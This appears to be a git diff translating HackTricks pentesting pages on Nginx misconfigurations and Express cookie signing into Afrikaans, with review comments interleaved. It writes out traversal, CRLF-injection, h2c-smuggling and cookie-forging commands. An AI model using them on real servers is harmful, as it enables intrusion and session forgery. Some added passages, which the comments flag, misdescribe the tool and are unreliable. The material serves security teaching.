-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## Missing root location +## Ontbrekende hooflokasie -## **Essentials of Configuring Nginx Root Directory** - -When configuring the Nginx server, the **root directive** plays a critical role by defining the base directory from which files are served. Consider the example below: +## **Essensiële beginsels van die konfigurasie van die Nginx-hoofgids** +Wanneer die Nginx-bediener gekonfigureer word, speel die **root-aanwysing** 'n kritieke rol deur die basisgids te definieer waarvandaan lêers bedien word. Oorweeg die volgende voorbeeld: ```bash server { - root /etc/nginx; +root /etc/nginx; - location /hello.txt { - try_files $uri $uri/ =404; - proxy_pass http://127.0.0.1:8080/; - } +location /hello.txt { +try_files $uri $uri/ =404; +proxy_pass http://127.0.0.1:8080/; +} } ``` +In hierdie konfigurasie word `/etc/nginx` as die hoofgids aangewys. Hierdie opset maak toegang tot lêers binne die gespesifiseerde hoofgids moontlik, soos `/hello.txt`. Dit is egter belangrik om op te let dat slegs 'n spesifieke ligging (`/hello.txt`) gedefinieer is. Daar is geen konfigurasie vir die hoofligging (`location / {...}`) nie. 
Hierdie weglatings beteken dat die hoofopdrag globaal van toepassing is, wat beteken dat versoek na die hoofpad `/` toegang tot lêers onder `/etc/nginx` kan verkry. -In this configuration, `/etc/nginx` is designated as the root directory. This setup allows access to files within the specified root directory, such as `/hello.txt`. However, it's crucial to note that only a specific location (`/hello.txt`) is defined. There's no configuration for the root location (`location / {...}`). This omission means that the root directive applies globally, enabling requests to the root path `/` to access files under `/etc/nginx`. +'n Kritieke veiligheidsoorweging ontstaan as gevolg van hierdie konfigurasie. 'n Eenvoudige `GET` versoek, soos `GET /nginx.conf`, kan sensitiewe inligting blootstel deur die Nginx konfigurasie-lêer wat by `/etc/nginx/nginx.conf` geleë is, te bedien. Deur die hoofgids na 'n minder sensitiewe gids, soos `/etc`, te stel, kan hierdie risiko verminder word, maar dit kan steeds onbedoelde toegang tot ander kritieke lêers moontlik maak, insluitend ander konfigurasie-lêers, toegangsjoernale en selfs versleutelde geloofsbriewe wat gebruik word vir HTTP basiese outentifikasie. -A critical security consideration arises from this configuration. A simple `GET` request, like `GET /nginx.conf`, could expose sensitive information by serving the Nginx configuration file located at `/etc/nginx/nginx.conf`. Setting the root to a less sensitive directory, like `/etc`, could mitigate this risk, yet it still may allow unintended access to other critical files, including other configuration files, access logs, and even encrypted credentials used for HTTP basic authentication. - -## Alias LFI Misconfiguration - -In the configuration files of Nginx, a close inspection is warranted for the "location" directives. 
A vulnerability known as Local File Inclusion (LFI) can be inadvertently introduced through a configuration that resembles the following: +## Alias LFI Misconfiguratie +In die konfigurasie lêers van Nginx is 'n noukeurige ondersoek van die "ligging" opdragte nodig. 'n Kwesbaarheid wat bekend staan as Plaaslike Lêer Insluiting (LFI) kan onbedoeld deur 'n konfigurasie soos die volgende ingevoer word: ``` -location /imgs { - alias /path/images/; +location /imgs { +alias /path/images/; } ``` +Hierdie konfigurasie is vatbaar vir LFI-aanvalle as gevolg van die bedieners wat versoek soos `/imgs../flag.txt` interpreteer as 'n poging om lêers buite die bedoelde gids te benader, wat effektief oplos na `/path/images/../flag.txt`. Hierdie fout stel aanvallers in staat om lêers van die bediener se lêersisteem te herwin wat nie toeganklik behoort te wees via die web nie. -This configuration is prone to LFI attacks due to the server interpreting requests like `/imgs../flag.txt` as an attempt to access files outside the intended directory, effectively resolving to `/path/images/../flag.txt`. This flaw allows attackers to retrieve files from the server's filesystem that should not be accessible via the web. - -To mitigate this vulnerability, the configuration should be adjusted to: - +Om hierdie kwesbaarheid te verminder, moet die konfigurasie aangepas word na: ``` -location /imgs/ { - alias /path/images/; +location /imgs/ { +alias /path/images/; } ``` +Meer inligting: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/) -More info: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/) - -Accunetix tests: - +Accunetix toetse: ``` alias../ => HTTP status code 403 alias.../ => HTTP status code 404 
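Review bot: both Nginx configuration blocks in this hunk lose their indentation (`-    root /etc/nginx;` becomes `+root /etc/nginx;`, `-    alias /path/images/;` becomes `+alias /path/images/;`, and the `location /hello.txt { ... }` body likewise); these are whitespace-only changes inside fenced code and should be reverted so the examples stay as they were. In the prose, `"location" directives` is rendered as `"ligging" opdragte`: `location` is an Nginx directive name and has to stay untranslated, consistent with `root` and `alias` elsewhere in the same hunk, otherwise readers cannot match the sentence to the `location /imgs {` block it explains.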
@@ -72,37 +65,27 @@ alias../../ => HTTP status code 403 alias../../../../../../../../../../../ => HTTP status code 400 alias../ => HTTP status code 403 ``` +## Onveilige padbeperking -## Unsafe path restriction - -Check the following page to learn how to bypass directives like: - +Kyk na die volgende bladsy om te leer hoe om riglyne soos die volgende te omseil: ```plaintext location = /admin { - deny all; +deny all; } location = /admin/ { - deny all; +deny all; } ``` +## Onveilige gebruik van veranderlikes -{% content-ref url="../../pentesting-web/proxy-waf-protections-bypass.md" %} -[proxy-waf-protections-bypass.md](../../pentesting-web/proxy-waf-protections-bypass.md) -{% endcontent-ref %} - -## Unsafe variable use - -A vulnerability in Nginx configuration is demonstrated by the example below: - +'n Kwesbaarheid in die Nginx-konfigurasie word gedemonstreer deur die volgende voorbeeld: ``` location / { - return 302 https://example.com$uri; +return 302 https://example.com$uri; } ``` - -The characters \r (Carriage Return) and \n (Line Feed) signify new line characters in HTTP requests, and their URL-encoded forms are represented as `%0d%0a`. Including these characters in a request (e.g., `http://localhost/%0d%0aDetectify:%20clrf`) to a misconfigured server results in the server issuing a new header named `Detectify`. This happens because the $uri variable decodes the URL-encoded new line characters, leading to an unexpected header in the response: - +Die karakters \r (Carriage Return) en \n (Line Feed) dui nuwe lyn karakters aan in HTTP-versoeke, en hul URL-gekodeerde vorms word voorgestel as `%0d%0a`. Deur hierdie karakters in 'n versoek in te sluit (bv. `http://localhost/%0d%0aDetectify:%20clrf`) na 'n verkeerd gekonfigureerde bediener, sal die bediener 'n nuwe kop met die naam `Detectify` uitreik. 
Dit gebeur omdat die $uri-veranderlike die URL-gekodeerde nuwe lyn karakters ontkodeer, wat lei tot 'n onverwagte kop in die respons: ``` HTTP/1.1 302 Moved Temporarily Server: nginx/1.19.3 
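Review bot: this hunk deletes the `{% content-ref url="../../pentesting-web/proxy-waf-protections-bypass.md" %} ... {% endcontent-ref %}` block, but the sentence before it, `Kyk na die volgende bladsy om te leer hoe om riglyne soos die volgende te omseil:`, still promises a page to look at, so the reference now dangles and the reader is never told where the bypass techniques are. Restore the content-ref block right after the `location = /admin` code block, before the `## Onveilige gebruik van veranderlikes` heading. The `deny all;` and `return 302 https://example.com$uri;` lines also lose their indentation, a whitespace-only change inside fenced code that should be reverted.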
@@ -112,146 +95,132 @@ Connection: keep-alive Location: https://example.com/ Detectify: clrf ``` +Leer meer oor die risiko's van CRLF-injeksie en responsplitsing by [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). -Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). +### Enige veranderlike -### Any variable - -It was discovered that **user-supplied data** might be treated as an **Nginx variable** under certain circumstances. The cause of this behavior remains somewhat elusive, yet it's not rare nor straightforward to verify. This anomaly was highlighted in a security report on HackerOne, which can be viewed [here](https://hackerone.com/reports/370094). Further investigation into the error message led to the identification of its occurrence within the [SSI filter module of Nginx's codebase](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), pinpointing Server Side Includes (SSI) as the root cause. - -To **detect this misconfiguration**, the following command can be executed, which involves setting a referer header to test for variable printing: +Daar is ontdek dat **gebruikersverskafte data** as 'n **Nginx-veranderlike** behandel kan word onder sekere omstandighede. Die oorsaak van hierdie gedrag bly ietwat raaiselagtig, maar dit is nie selde of maklik om te verifieer nie. Hierdie anomalie is uitgelig in 'n veiligheidsverslag op HackerOne, wat hier besigtig kan word [hier](https://hackerone.com/reports/370094). 
Verdere ondersoek na die foutboodskap het gelei tot die identifikasie van sy voorkoms binne die [SSI-filtermodule van Nginx se kodebasis](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), wat Server Side Includes (SSI) as die hoofoor-saak aanwys. +Om hierdie verkeerde konfigurasie op te spoor, kan die volgende opdrag uitgevoer word, wat die instelling van 'n verwysingskop behels om vir veranderlike druk te toets: ```bash $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ ``` +Skanderings vir hierdie verkeerde konfigurasie oor stelsels het verskeie gevalle aan die lig gebring waar Nginx-veranderlikes deur 'n gebruiker gedruk kon word. Nietemin, 'n afname in die aantal kwesbare gevalle dui daarop dat pogings om hierdie probleem reg te stel, enigsins suksesvol was. -Scans for this misconfiguration across systems revealed multiple instances where Nginx variables could be printed by a user. However, a decrease in the number of vulnerable instances suggests that efforts to patch this issue have been somewhat successful. +## Lewerings van onbewerkte agterste antwoorde -## Raw backend response reading - - -Nginx offers a feature through `proxy_pass` that allows for the interception of errors and HTTP headers produced by the backend, aiming to hide internal error messages and headers. This is accomplished by Nginx serving custom error pages in response to backend errors. However, challenges arise when Nginx encounters an invalid HTTP request. Such a request gets forwarded to the backend as received, and the backend's raw response is then directly sent to the client without Nginx's intervention. - -Consider an example scenario involving a uWSGI application: +Nginx bied 'n funksie deur middel van `proxy_pass` wat die onderskepping van foute en HTTP-koppele wat deur die agterste vervaardig word, moontlik maak, met die doel om interne foutboodskappe en koppele te verberg. 
Dit word bereik deur Nginx aangepaste foutbladsye as antwoord op agterste foute te bedien. Tog ontstaan uitdagings wanneer Nginx 'n ongeldige HTTP-versoek teëkom. So 'n versoek word soos ontvang na die agterste deurgestuur, en die agterste se onbewerkte antwoord word dan direk na die kliënt gestuur sonder Nginx se tussenkoms. +Oorweeg 'n voorbeeldscenario met 'n uWSGI-toepassing: ```python def application(environ, start_response): - start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')]) - return [b"Secret info, should not be visible!"] +start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')]) +return [b"Secret info, should not be visible!"] ``` - -To manage this, specific directives in the Nginx configuration are used: - +Om dit te bestuur, word spesifieke riglyne in die Nginx-konfigurasie gebruik: ``` http { - error_page 500 /html/error.html; - proxy_intercept_errors on; - proxy_hide_header Secret-Header; +error_page 500 /html/error.html; +proxy_intercept_errors on; +proxy_hide_header Secret-Header; } ``` +- **[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors)**: Hierdie riglyn stel Nginx in staat om 'n aangepaste reaksie te dien vir agterkant reaksies met 'n statuskode groter as 300. Dit verseker dat, vir ons voorbeeld uWSGI-toepassing, 'n `500 Fout` reaksie onderskep en hanteer word deur Nginx. +- **[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header)**: Soos die naam aandui, verberg hierdie riglyn gespesifiseerde HTTP-koppe van die kliënt, wat privaatheid en veiligheid verbeter. -- **[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors)**: This directive enables Nginx to serve a custom response for backend responses with a status code greater than 300. 
It ensures that, for our example uWSGI application, a `500 Error` response is intercepted and handled by Nginx. -- **[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header)**: As the name suggests, this directive hides specified HTTP headers from the client, enhancing privacy and security. - -When a valid `GET` request is made, Nginx processes it normally, returning a standard error response without revealing any secret headers. However, an invalid HTTP request bypasses this mechanism, resulting in the exposure of raw backend responses, including secret headers and error messages. +Wanneer 'n geldige `GET` versoek gemaak word, verwerk Nginx dit normaalweg en gee 'n standaard fout reaksie sonder om enige geheime koppe te onthul. 'n Ongeldige HTTP versoek omseil egter hierdie meganisme, wat lei tot die blootstelling van rou agterkant reaksies, insluitend geheime koppe en foutboodskappe. -## merge\_slashes set to off +## merge\_slashes gestel op off -By default, Nginx's **`merge_slashes` directive** is set to **`on`**, which compresses multiple forward slashes in a URL into a single slash. This feature, while streamlining URL processing, can inadvertently conceal vulnerabilities in applications behind Nginx, particularly those prone to local file inclusion (LFI) attacks. Security experts **Danny Robinson and Rotem Bar** have highlighted the potential risks associated with this default behavior, especially when Nginx acts as a reverse-proxy. +Standaard is Nginx se **`merge_slashes` riglyn** gestel op **`on`**, wat meervoudige vorentoe slasies in 'n URL saamdruk tot 'n enkele slasie. Hierdie funksie, terwyl dit URL-verwerking stroomlyn, kan onbedoeld kwesbaarhede in toepassings agter Nginx verberg, veral dié wat vatbaar is vir plaaslike lêer insluiting (LFI) aanvalle. 
Sekuriteitsexperts **Danny Robinson en Rotem Bar** het die potensiële risiko's wat verband hou met hierdie verstekgedrag beklemtoon, veral wanneer Nginx as 'n omgekeerde proksi optree. -To mitigate such risks, it is recommended to **turn the `merge_slashes` directive off** for applications susceptible to these vulnerabilities. This ensures that Nginx forwards requests to the application without altering the URL structure, thereby not masking any underlying security issues. +Om sulke risiko's te verminder, word dit aanbeveel om die `merge_slashes` riglyn af te skakel vir toepassings wat vatbaar is vir hierdie kwesbaarhede. Dit verseker dat Nginx versoek na die toepassing stuur sonder om die URL-struktuur te verander, en dus nie enige onderliggende veiligheidsprobleme verberg nie. -For more information check [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). +Vir meer inligting, kyk na [Danny Robinson en Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). -### **Default Value in Map Directive** - -In the **Nginx configuration**, the `map` directive often plays a role in **authorization control**. A common mistake is not specifying a **default** value, which could lead to unauthorized access. For instance: +### **Verstekwaarde in Map Riglyn** +In die **Nginx-konfigurasie** speel die `map` riglyn dikwels 'n rol in **toestemmingsbeheer**. 'n Algemene fout is om nie 'n **verstek** waarde te spesifiseer nie, wat kan lei tot ongemagtigde toegang. Byvoorbeeld: ```yaml http { - map $uri $mappocallow { - /map-poc/private 0; - /map-poc/secret 0; - /map-poc/public 1; - } +map $uri $mappocallow { +/map-poc/private 0; +/map-poc/secret 0; +/map-poc/public 1; +} } ``` ```yaml server { - location /map-poc { - if ($mappocallow = 0) {return 403;} - return 200 "Hello. 
It is private area: $mappocallow"; - } +location /map-poc { +if ($mappocallow = 0) {return 403;} +return 200 "Hello. It is private area: $mappocallow"; +} } ``` +Sonder 'n `default`, kan 'n **booswillige gebruiker** sekuriteit omseil deur toegang te verkry tot 'n **ongedefinieerde URI** binne `/map-poc`. [Die Nginx-handleiding](https://nginx.org/en/docs/http/ngx_http_map_module.html) beveel aan dat 'n **verstekwaarde** ingestel word om sulke probleme te voorkom. -Without a `default`, a **malicious user** can bypass security by accessing an **undefined URI** within `/map-poc`. [The Nginx manual](https://nginx.org/en/docs/http/ngx_http_map_module.html) advises setting a **default value** to avoid such issues. - -### **DNS Spoofing Vulnerability** - -DNS spoofing against Nginx is feasible under certain conditions. If an attacker knows the **DNS server** used by Nginx and can intercept its DNS queries, they can spoof DNS records. This method, however, is ineffective if Nginx is configured to use **localhost (127.0.0.1)** for DNS resolution. Nginx allows specifying a DNS server as follows: +### **DNS Spoofing Kwesbaarheid** +DNS-spoofing teen Nginx is moontlik onder sekere omstandighede. As 'n aanvaller die **DNS-bediener** wat deur Nginx gebruik word, ken en sy DNS-navrae kan onderskep, kan hulle DNS-rekords vervals. Hierdie metode is egter ondoeltreffend as Nginx gekonfigureer is om **localhost (127.0.0.1)** vir DNS-oplossing te gebruik. Nginx maak dit moontlik om 'n DNS-bediener as volg te spesifiseer: ```yaml resolver 8.8.8.8; ``` +### **`proxy_pass` en `internal` Direktiewe** -### **`proxy_pass` and `internal` Directives** - -The **`proxy_pass`** directive is utilized for redirecting requests to other servers, either internally or externally. The **`internal`** directive ensures that certain locations are only accessible within Nginx. 
While these directives are not vulnerabilities by themselves, their configuration requires careful examination to prevent security lapses. +Die **`proxy_pass`**-direktief word gebruik om versoek na ander bedieners te stuur, intern of ekstern. Die **`internal`**-direktief verseker dat sekere areas slegs binne Nginx toeganklik is. Alhoewel hierdie direktiewe nie opsigself kwesbaarhede is nie, vereis hul konfigurasie noukeurige ondersoek om sekuriteitsfoute te voorkom. ## proxy\_set\_header Upgrade & Connection -If the nginx server is configured to pass the Upgrade and Connection headers an [**h2c Smuggling attack**](../../pentesting-web/h2c-smuggling.md) could be performed to access protected/internal endpoints. +As die nginx-bediner gekonfigureer is om die Upgrade- en Connection-koptekens oor te dra, kan 'n [**h2c Smuggling-aanval**](../../pentesting-web/h2c-smuggling.md) uitgevoer word om toegang tot beskermde/intern eindpunte te verkry. {% hint style="danger" %} -This vulnerability would allow an attacker to **stablish a direct connection with the `proxy_pass` endpoint** (`http://backend:9999` in this case) that whose content is not going to be checked by nginx. +Hierdie kwesbaarheid sal 'n aanvaller in staat stel om 'n **direkte verbinding met die `proxy_pass`-eindpunt** (`http://backend:9999` in hierdie geval) te vestig waarvan die inhoud nie deur nginx nagegaan sal word nie. 
{% endhint %} -Example of vulnerable configuration to steal `/flag` from [here](https://bishopfox.com/blog/h2c-smuggling-request): - +Voorbeeld van 'n kwesbare konfigurasie om `/flag` te steel van [hier](https://bishopfox.com/blog/h2c-smuggling-request): ``` server { - listen 443 ssl; - server_name localhost; +listen 443 ssl; +server_name localhost; - ssl_certificate /usr/local/nginx/conf/cert.pem; - ssl_certificate_key /usr/local/nginx/conf/privkey.pem; +ssl_certificate /usr/local/nginx/conf/cert.pem; +ssl_certificate_key /usr/local/nginx/conf/privkey.pem; - location / { - proxy_pass http://backend:9999; - proxy_http_version 1.1; - proxy_set_header Upgrade $http_upgrade; - proxy_set_header Connection $http_connection; - } +location / { +proxy_pass http://backend:9999; +proxy_http_version 1.1; +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +} - location /flag { - deny all; - } +location /flag { +deny all; +} ``` - {% hint style="warning" %} -Note that even if the `proxy_pass` was pointing to a specific **path** such as `http://backend:9999/socket.io` the connection will be stablished with `http://backend:9999` so you can **contact any other path inside that internal endpoint. So it doesn't matter if a path is specified in the URL of proxy\_pass.** +Let wel dat selfs as die `proxy_pass` na 'n spesifieke **pad** verwys, soos `http://backend:9999/socket.io`, die verbinding met `http://backend:9999` tot stand gebring sal word, sodat jy **enige ander pad binne daardie interne eindpunt kan kontak. Dit maak dus nie saak of 'n pad gespesifiseer word in die URL van proxy\_pass nie.** {% endhint %} -## Try it yourself +## Probeer dit self -Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! 
+Detectify het 'n GitHub-opberging geskep waar jy Docker kan gebruik om jou eie kwesbare Nginx-toetsbediener op te stel met sommige van die verkeerde konfigurasies wat in hierdie artikel bespreek word, en probeer om hulle self te vind! [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) -## Static Analyzer tools +## Statische analisehulpmiddels ### [GIXY](https://github.com/yandex/gixy) -Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection. +Gixy is 'n hulpmiddel om Nginx-konfigurasie te analiseer. Die hoofdoel van Gixy is om sekuriteitsverkeerde konfigurasie te voorkom en foutopsporing te outomatiseer. ### [Nginxpwner](https://github.com/stark0de/nginxpwner) -Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities. +Nginxpwner is 'n eenvoudige hulpmiddel om na algemene Nginx-verkeerde konfigurasies en kwesbaarhede te soek. -## References +## Verwysings * [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) @@ -259,20 +228,20 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsbeoordeling en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ hulpmiddels & funksies wat vanaf rekognisering tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel aangepaste hulpmiddels, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te laat spat en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opberge.
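Review bot: the translated Python block in the uWSGI example loses the function body's indentation: `+start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])` and `+return [b"Secret info, should not be visible!"]` now sit at column 0 directly under `def application(environ, start_response):`, which is a SyntaxError, so the example no longer runs; restore the four-space indent. The same stripping hits the `http { ... }`, `map ... { ... }` and `server { ... }` nginx blocks, where it is only cosmetic but should be reverted as well. In the `proxy_intercept_errors` bullet, `500 Fout` translates the literal status string the code emits; keep `500 Error` inside the backticks so it matches `start_response('500 Error', ...)`. Minor typos: `nginx-bediner` should be `nginx-bediener`, and `Statische analisehulpmiddels` is Dutch; the Afrikaans heading is `Statiese analisehulpmiddels`.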
diff --git a/network-services-pentesting/pentesting-web/nodejs-express.md b/network-services-pentesting/pentesting-web/nodejs-express.md index 96d0b27e6..437d0adfd 100644 --- a/network-services-pentesting/pentesting-web/nodejs-express.md +++ b/network-services-pentesting/pentesting-web/nodejs-express.md 
@@ -1,37 +1,95 @@ # NodeJS Express -## Cookie Signature +## Koekie Handtekening -The tool [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is a utility for automating the testing and re-signing of Express.js cookie secrets. - -### Single cookie with a specific name +Die instrument [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is 'n nut vir outomatiese toetsing en herondertekening van Express.js koekiegeheime. +### Enkel koekie met 'n spesifieke naam ```bash cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session ``` +### Aangepaste woordenlys -### Custom wordlist +If you are conducting a penetration test on a web application built with Node.js and Express, you may want to create a custom wordlist to use in your attacks. A wordlist is a file that contains a list of words, which can be used for various purposes such as password cracking or brute-forcing. +As a penetration tester, you can create a custom wordlist tailored to the specific target application you are testing. This can include common passwords, usernames, or any other relevant keywords that may be used by the application's users. + +To create a custom wordlist, you can start by brainstorming potential keywords that may be relevant to the target application. This can include words related to the application's industry, specific technologies used, or any other information that may be publicly available. + +Once you have a list of potential keywords, you can use various tools and techniques to generate different combinations and variations of these words. This can include adding numbers, special characters, or modifying the capitalization of the words. + +There are also tools available that can help you generate wordlists based on common patterns or rules. 
These tools can be useful for creating wordlists that follow specific password complexity requirements, such as including a certain number of uppercase letters, lowercase letters, numbers, or special characters. + +Once you have generated your custom wordlist, you can use it in various attacks during your penetration test. This can include password cracking attacks, username enumeration, or any other attack that requires a list of potential keywords. + +Remember to always obtain proper authorization before conducting any penetration testing activities, and to use the custom wordlist responsibly and ethically. ```bash cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst ``` +### Toets verskeie koekies deur middel van groepmodus -### Test multiple cookies using batch mode +Om die veiligheid van 'n webtoepassing te toets, is dit soms nodig om verskeie koekies te toets wat deur die toepassing gebruik word. Hierdie koekies kan verskillende toegangsniveaus of funksionaliteit verteenwoordig. +Met Node.js en Express kan jy 'n groepmodus gebruik om verskeie koekies te toets. Hier is 'n voorbeeld van hoe jy dit kan doen: + +```javascript +const request = require('request'); + +const cookies = [ + 'cookie1=value1', + 'cookie2=value2', + 'cookie3=value3' +]; + +const options = { + url: 'http://example.com', + headers: { + 'Cookie': cookies.join('; ') + } +}; + +request(options, (error, response, body) => { + if (error) { + console.error(error); + } else { + console.log(body); + } +}); +``` + +In hierdie voorbeeld word die `request`-biblioteek gebruik om 'n HTTP-aanvraag na 'n webtoepassing te stuur. Die `cookies`-array bevat die verskeie koekies wat getoets moet word. Die `options`-objek bevat die URL van die webtoepassing en die `Cookie`-kop wat die koekies bevat. + +Deur die koekies in die `Cookie`-kop te voeg deur middel van die `join`-metode, kan jy 'n enkele string van die koekies maak wat deur die webtoepassing gebruik sal word. 
+ +Die `request`-funksie stuur die HTTP-aanvraag en roep 'n terugroepfunksie aan wanneer die antwoord ontvang word. In hierdie voorbeeld word die antwoord se liggaam eenvoudig na die konsole uitgevoer, maar jy kan dit aanpas om die nodige toetslogika uit te voer. + +Met hierdie benadering kan jy verskeie koekies toets en die reaksie van die webtoepassing analiseer om enige potensiële kwesbaarhede of probleme te identifiseer. ```bash cookie-monster -b -f cookies.json ``` +### Toets verskeie koekies deur middel van lotmodus met 'n aangepaste woordelys -### Test multiple cookies using batch mode with a custom wordlist +Om verskeie koekies te toets deur middel van lotmodus met 'n aangepaste woordelys, kan jy die volgende stappe volg: +1. Skep 'n woordelys met moontlike koekiewaardes wat jy wil toets. +2. Stoor die woordelys in 'n tekslêer, byvoorbeeld `cookies.txt`. +3. Gebruik 'n hulpmiddel soos cURL of een van die verskeie HTTP-kliënte om 'n versoek na die doelwebwerf te stuur. Byvoorbeeld: + +```bash +curl -b cookies.txt https://www.example.com +``` + +4. Analiseer die HTTP-antwoord om te bepaal of die koekie geldig is of nie. Jy kan kyk na die statuskode, inhoud van die antwoord, of enige ander relevante inligting. +5. Herhaal die proses vir elke moontlike koekiewaarde in jou woordelys. + +Deur hierdie stappe te volg, kan jy verskeie koekies toets deur middel van lotmodus met 'n aangepaste woordelys. Dit kan jou help om potensiële kwesbaarhede of swakheid in die koekiehantering van die webwerf te identifiseer. ```bash cookie-monster -b -f cookies.json -w custom.lst ``` +### Enkodeer en teken 'n nuwe koekie -### Encode and sign a new cookie - -iI you know the secret you can sign a the cookie. - +As jy die geheim ken, kan jy die koekie teken. ```bash cookie-monster -e -f new_cookie.json -k secret ``` + 
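Review bot: this hunk adds material the English source never had, and it should be dropped rather than translated. Under `### Aangepaste woordenlys` (the heading itself is Dutch; Afrikaans is `woordelys`, as the later heading in the same hunk uses) an untranslated English essay on building password wordlists was inserted where the source only had the `cookie-monster -c ... -w custom.lst` command. Under the two batch-mode headings a `request`-based JavaScript snippet and a `curl -b cookies.txt https://www.example.com` walkthrough were inserted; both describe sending cookies to a target site, which is not what `cookie-monster -b -f cookies.json` does (per the hunk's own first paragraph the tool tests and re-signs Express.js cookie secrets, so batch mode runs that secret test over the cookies listed in the JSON file), and `request` is a deprecated npm package. Keep only the translated headings and the original commands. Also `groepmodus` and `lotmodus` are both used for `batch mode`; pick one, and `nut` for `utility` reads as `use`; `hulpmiddel` is the term used elsewhere in this patch.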
